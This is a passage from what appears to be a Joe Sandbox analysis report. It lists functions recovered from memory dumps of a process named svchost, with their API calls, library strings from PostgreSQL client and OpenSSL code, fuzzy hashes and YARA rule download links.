                                                                                            • Instruction ID: 9603875c128bdc32d08f5a64a90567fc91be498d92fcabba29608f83429b027d
                                                                                            • Opcode Fuzzy Hash: 68d3117696a1300142bdc936807f85c187c0fb69c36a8b612ef794b28a2c2579
                                                                                            • Instruction Fuzzy Hash: 7431C661F0B74285FA149F16B4202B963A2AF48BD4F4C5135EE5D6779BDF3EE4018708
                                                                                            Function 66016340 Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 92stringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: strcmpstrcpy
                                                                                            • String ID: 1$ASCII$CP%s$CP%u$CP1361$UTF-8$utf8
                                                                                            • API String ID: 1519103487-2156787605
                                                                                            • Opcode ID: e1db7c93cf5b70d4ba0ba0f65a78f5f88b2f0d7a2ad37ef213c1b56ae7847875
                                                                                            • Instruction ID: be7bc58e9f166aea21b4b45d5e1e2d565f648104c6a08d33aa0755e541aaf538
                                                                                            • Opcode Fuzzy Hash: e1db7c93cf5b70d4ba0ba0f65a78f5f88b2f0d7a2ad37ef213c1b56ae7847875
                                                                                            • Instruction Fuzzy Hash: BF31F432B5D65096EA11CB96EC10387EB65E7897ACFC44636CD2C43794EB7EC58AC301
                                                                                            Function 00007FFDA36F3C80 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 89librarystringwindowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LoadLibraryExA.KERNEL32(?,?,?,?,?,?,00000000,00007FFDA36E8D19,?,?,?,00007FFDA36E9D72), ref: 00007FFDA36F3CBC
                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00007FFDA36E8D19,?,?,?,00007FFDA36E9D72), ref: 00007FFDA36F3CD1
                                                                                            • memset.VCRUNTIME140(?,?,?,?,?,?,00000000,00007FFDA36E8D19,?,?,?,00007FFDA36E9D72), ref: 00007FFDA36F3D1E
                                                                                            • FormatMessageA.KERNEL32 ref: 00007FFDA36F3D4A
                                                                                            • strerror.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,00007FFDA36E8D19,?,?,?,00007FFDA36E9D72), ref: 00007FFDA36F3D7E
                                                                                            • libintl_gettext.LIBINTL-9(?,?,?,?,?,?,00000000,00007FFDA36E8D19,?,?,?,00007FFDA36E9D72), ref: 00007FFDA36F3DC7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorFormatLastLibraryLoadMessagelibintl_gettextmemsetstrerror
                                                                                            • String ID: netmsg.dll$operating system error %d$unrecognized winsock error %d$winsock error %d (could not load netmsg.dll to translate: error code %lu)
                                                                                            • API String ID: 252814119-2704675961
                                                                                            • Opcode ID: 67bdfc0701c5697eebee649abdaaa68898a284d9d033e0692bced8f1b55de6a1
                                                                                            • Instruction ID: ad628c3f0de1dc1e2f130fd9081c09f33c2d603c2174528be94d1e022b414373
                                                                                            • Opcode Fuzzy Hash: 67bdfc0701c5697eebee649abdaaa68898a284d9d033e0692bced8f1b55de6a1
                                                                                            • Instruction Fuzzy Hash: CD31CE61B0B64241FA149B0AB8203B56362BF88BD4F9C1135DD5D67BEBEF3EE4418708
                                                                                            Function 00007FFDA36EB010 Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 81stringCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: Time$FilePreciseSystem_localtime64fputcstrftime
                                                                                            • String ID: %d$%Y-%m-%d %H:%M:%S$%s$.%06u$CancelRequest$F%d$Unknown message: length is %d
                                                                                            • API String ID: 3990603502-3493573826
                                                                                            • Opcode ID: 2633b100bf8dd3bffce0ca744b574df00262f3b0acea8f130d620fa9fe79fd62
                                                                                            • Instruction ID: d84782529e5579cb92c8344608269b3abd0481d7fc8a4dc12c68da2a813110b6
                                                                                            • Opcode Fuzzy Hash: 2633b100bf8dd3bffce0ca744b574df00262f3b0acea8f130d620fa9fe79fd62
                                                                                            • Instruction Fuzzy Hash: 2B41B63171BA8681FB20CB15E4642A97322FF84BD8F586232DA4E1379ADF7EE505C744
                                                                                            Function 00007FFDA361C410 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 62COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: L_sk_pop$L_sk_new_nullL_sk_pushR_newR_set_debugR_set_errorT_free
                                                                                            • String ID: ct_move_scts$ssl\ssl_lib.c
                                                                                            • API String ID: 2898183876-1945711875
                                                                                            • Opcode ID: cbaa212015b02ca3eac7ae01570107f86f471106c1ba61f8259b0908e4114b4a
                                                                                            • Instruction ID: 617acf480cd66ea7f926e8ea0b80b18e0f5cca1725ed4d2657a4da755695940a
                                                                                            • Opcode Fuzzy Hash: cbaa212015b02ca3eac7ae01570107f86f471106c1ba61f8259b0908e4114b4a
                                                                                            • Instruction Fuzzy Hash: B8219621B0F74242FA10EB65942017D6656EF99B80F0C6071EE4E63BD7DE3EE4419318
                                                                                            Function 00007FFDA36E4240 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 142COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: __acrt_iob_funcfreemallocmemset
                                                                                            • String ID: %%s %%-%ds$%%s %%s$%s$out of memory$|%s
                                                                                            • API String ID: 2794046227-1857694925
                                                                                            • Opcode ID: c390ec889e4d9d56021e8fbf0c33fc023ee6495dfa6382d26169113ed30df47b
                                                                                            • Instruction ID: 776836f7229e4ea5a6e1d9459cd8a5cbadaf6acef2b93b79faf4af3fc42ea160
                                                                                            • Opcode Fuzzy Hash: c390ec889e4d9d56021e8fbf0c33fc023ee6495dfa6382d26169113ed30df47b
                                                                                            • Instruction Fuzzy Hash: EA518012B0B64289F915DB26A9313B96353AF44BC0F9C3131DD0E67757EE7EE4098308
                                                                                            Function 00007FFDA36D1C60 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 128stringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFDA36D1410), ref: 00007FFDA36D1C7F
                                                                                            • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFDA36D1410), ref: 00007FFDA36D1D02
                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFDA36D1410), ref: 00007FFDA36D1D4B
                                                                                            • strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,?,00007FFDA36D1410), ref: 00007FFDA36D1DB3
                                                                                              • Part of subcall function 00007FFDA36E2D70: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,-00000001,00007FFDA36D15B3), ref: 00007FFDA36E2D89
                                                                                              • Part of subcall function 00007FFDA36E2D70: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA36E2DB1
                                                                                              • Part of subcall function 00007FFDA36E2D70: libintl_dgettext.LIBINTL-9 ref: 00007FFDA36E2DD2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errno_strdup$libintl_dgettextmallocstrtol
                                                                                            • String ID: invalid SCRAM response (nonce mismatch)$malformed SCRAM message (garbage at end of server-first-message)$malformed SCRAM message (invalid iteration count)$malformed SCRAM message (invalid salt)$out of memory
                                                                                            • API String ID: 690629157-1082015424
                                                                                            • Opcode ID: fcc66b80b5218fa4746dfd9456b9021e4de867423d8047dbd469ddc31809edd9
                                                                                            • Instruction ID: 1b188a38e411f68b4da4e881609c711402e335d4198d8098a12d8e663bf34020
                                                                                            • Opcode Fuzzy Hash: fcc66b80b5218fa4746dfd9456b9021e4de867423d8047dbd469ddc31809edd9
                                                                                            • Instruction Fuzzy Hash: 5441B462B0BB4648FA558F55A4202B92792AF457D4F4C3030DA0D273D7EFBDE485C344
                                                                                            Function 00007FFDA36E7AA0 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 97COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • memcmp.VCRUNTIME140 ref: 00007FFDA36E7B28
                                                                                            • inet_pton.WS2_32 ref: 00007FFDA36E7B4F
                                                                                            • memcmp.VCRUNTIME140 ref: 00007FFDA36E7B65
                                                                                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA36E7B99
                                                                                            • _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA36E7BF5
                                                                                              • Part of subcall function 00007FFDA36F5490: isdigit.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000000,?,00000002,00007FFDA36E7B19), ref: 00007FFDA36F5516
                                                                                              • Part of subcall function 00007FFDA36F5490: isxdigit.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA36F5539
                                                                                              • Part of subcall function 00007FFDA36F5490: islower.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA36F5545
                                                                                              • Part of subcall function 00007FFDA36F5490: isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000000,?,00000002,00007FFDA36E7B19), ref: 00007FFDA36F55A7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcmp$_errno_strdupinet_ptonisdigitislowerisspaceisxdigit
                                                                                            • String ID: .$certificate contains IP address with invalid length %zu$could not convert certificate's IP address to string: %s$host name must be specified
                                                                                            • API String ID: 4044949803-2902407262
                                                                                            • Opcode ID: f19e7713b305a99309a9cecdce80f1332364a7b232cf699e17a4868061b1fd24
                                                                                            • Instruction ID: 762142bb1d98c9d74f63dd2b7e8bf91f78ecb8fa98faae29b252ffb1525561b4
                                                                                            • Opcode Fuzzy Hash: f19e7713b305a99309a9cecdce80f1332364a7b232cf699e17a4868061b1fd24
                                                                                            • Instruction Fuzzy Hash: 2F41B171B0BB4241FA61DF15E4203F92362AB85BD0F586131DE4D27796EF3EE5498708
                                                                                            Function 00007FFDA36D52E0 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 97stringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00007FFDA36EBCA0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,-00000001,00007FFDA36D14CE), ref: 00007FFDA36EBCAE
                                                                                              • Part of subcall function 00007FFDA36D8370: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFDA36DA885,?,?,?,00007FFDA36D6A42,?,?,?,00007FFDA36D3380), ref: 00007FFDA36D8382
                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA36D5386
                                                                                            • _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA36D53F9
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA36D541E
                                                                                              • Part of subcall function 00007FFDA36E2CD0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,00007FFDA36D1C16,?,?,?,?,00007FFDA36D1CA5), ref: 00007FFDA36E2CE8
                                                                                              • Part of subcall function 00007FFDA36E2CD0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA36E2D10
                                                                                              • Part of subcall function 00007FFDA36E2CD0: libintl_dgettext.LIBINTL-9 ref: 00007FFDA36E2D31
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errnomalloc$_strdupfreelibintl_dgettextstrcmp
                                                                                            • String ID: 1$out of memory$prefer$require$requiressl$sslmode
                                                                                            • API String ID: 159604881-3175095941
                                                                                            • Opcode ID: 2ea1d13a237264883a3404e7c84326039b87f7d5543c7237b979e9166fdb883a
                                                                                            • Instruction ID: 3f1e5f3534bc33fe3e82de8dd23363ab82f645a7b3b5a9ff9b5ee346e53974b2
                                                                                            • Opcode Fuzzy Hash: 2ea1d13a237264883a3404e7c84326039b87f7d5543c7237b979e9166fdb883a
                                                                                            • Instruction Fuzzy Hash: 14419422B0BB4286FA508B16E46037967A2FF45B81F5C2135DB8D63B96EF3EE444C714
                                                                                            Function 00007FFDA36EA781 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 79COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: fputcisprint
                                                                                            • String ID: "%s"$ %c$ %d$ \x%02x$DataRow$Describe$mismatched message length: consumed %d, expected %d
                                                                                            • API String ID: 3787447051-3769170408
                                                                                            • Opcode ID: 57490bd248cd5b0d53f2c7c806297d899b22f64b5ca0fc5719161b090a49d377
                                                                                            • Instruction ID: 59fe4f20ccf96c8ad945c2b1e93bd01510a2e4aebf5b722086a920110268f15e
                                                                                            • Opcode Fuzzy Hash: 57490bd248cd5b0d53f2c7c806297d899b22f64b5ca0fc5719161b090a49d377
                                                                                            • Instruction Fuzzy Hash: 3F31E562B1B28682F610DB15E4606F96763AF407C8F487132DE0E23797CE7EE549C308
                                                                                            Function 00007FFDA36D8830 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 75stringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _strdupfreestrcmp
                                                                                            • String ID: invalid connection option "%s"$out of memory$prefer$require$requiressl$sslmode
                                                                                            • API String ID: 1900607443-2907004332
                                                                                            • Opcode ID: c3cf6a7e1567d56bf751ed82f569bcbe135e5690a94be67f6a9eca0878b2f7ee
                                                                                            • Instruction ID: c0e98d6896fe0c30c6e6bcbca18bbe0e311dc4b80ab71414c638ecc2c5b6d275
                                                                                            • Opcode Fuzzy Hash: c3cf6a7e1567d56bf751ed82f569bcbe135e5690a94be67f6a9eca0878b2f7ee
                                                                                            • Instruction Fuzzy Hash: 4931A212B0FBC285FE549B16E4242796792AF84BC0F0C6035DE4D2779BEE2EE444C308
                                                                                            Function 00007FFDA3615380 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 64COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: R_newR_set_debug$L_sk_numR_set_error
                                                                                            • String ID: SSL_CTX_set_ssl_version$ssl\ssl_lib.c
                                                                                            • API String ID: 3961781951-1646672100
                                                                                            • Opcode ID: edba7c28ef3a6bf41a983555b6c9a5eb45180de582e41dd75b9e93b44441d8e1
                                                                                            • Instruction ID: 110a5eda00c8a3c55584748a3a3a43d8f0c04251df251cd4e3f84bc0fe651d6d
                                                                                            • Opcode Fuzzy Hash: edba7c28ef3a6bf41a983555b6c9a5eb45180de582e41dd75b9e93b44441d8e1
                                                                                            • Instruction Fuzzy Hash: 73217F21B0F64282FB50EB61E4712B99252EF49784F5CA431EA4C677DBDE3EE4818319
                                                                                            Function 66014200 Relevance: 15.3, APIs: 10, Instructions: 282COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 89a4708f0f3316604be79fcb46ad18ce4641ab9c3ddcdd4e737397f0ff8ddc70
                                                                                            • Instruction ID: ffc3e861d4ef98dd4704aa29fb57a2bb400d0911773b95a1a4627edc2b901c72
                                                                                            • Opcode Fuzzy Hash: 89a4708f0f3316604be79fcb46ad18ce4641ab9c3ddcdd4e737397f0ff8ddc70
                                                                                            • Instruction Fuzzy Hash: 29811961D2C160A6F7118FED580079CEE91B3977CFFD16932EC928B269D6A4CDC2C291
                                                                                            Function 00007FFDA36F62B0 Relevance: 15.2, APIs: 10, Instructions: 228COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                            • String ID:
                                                                                            • API String ID: 190073905-0
                                                                                            • Opcode ID: 27b8b589965950e46f4c6e85234690edfc330f7ec3c844b469f909fcee4ff4b9
                                                                                            • Instruction ID: 874185153b056a4edfcd1137a21ae28f072139643a903294c286997865983fd6
                                                                                            • Opcode Fuzzy Hash: 27b8b589965950e46f4c6e85234690edfc330f7ec3c844b469f909fcee4ff4b9
                                                                                            • Instruction Fuzzy Hash: F8819F22F0F64386FAD0AB6594612792293AF45784F4CA03DDA0D77797DE3FE8058708
                                                                                            Function 00007FFDA36D5A90 Relevance: 15.1, APIs: 3, Strings: 7, Instructions: 144COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: PQrequestCancel() -- connection is not open$keepalives$keepalives_count$keepalives_idle$keepalives_interval$out of memory$tcp_user_timeout
                                                                                            • API String ID: 0-3338339123
                                                                                            • Opcode ID: 6a8690a5faad84c1e6e18edc5f2a2ed890cbe32bc9fcb7b817f5d39d190904c2
                                                                                            • Instruction ID: 561185a9e7705489c12594ce0444539e2c2406493571df19a747d68725e63a68
                                                                                            • Opcode Fuzzy Hash: 6a8690a5faad84c1e6e18edc5f2a2ed890cbe32bc9fcb7b817f5d39d190904c2
                                                                                            • Instruction Fuzzy Hash: D5719022B0AB8182F6588F24E5503A8B761FB45B94F486335DFAC63792DF39E1A5C304
                                                                                            Function 00007FFDA36D31A0 Relevance: 15.1, APIs: 3, Strings: 7, Instructions: 100COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA36D3200
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA36D3280
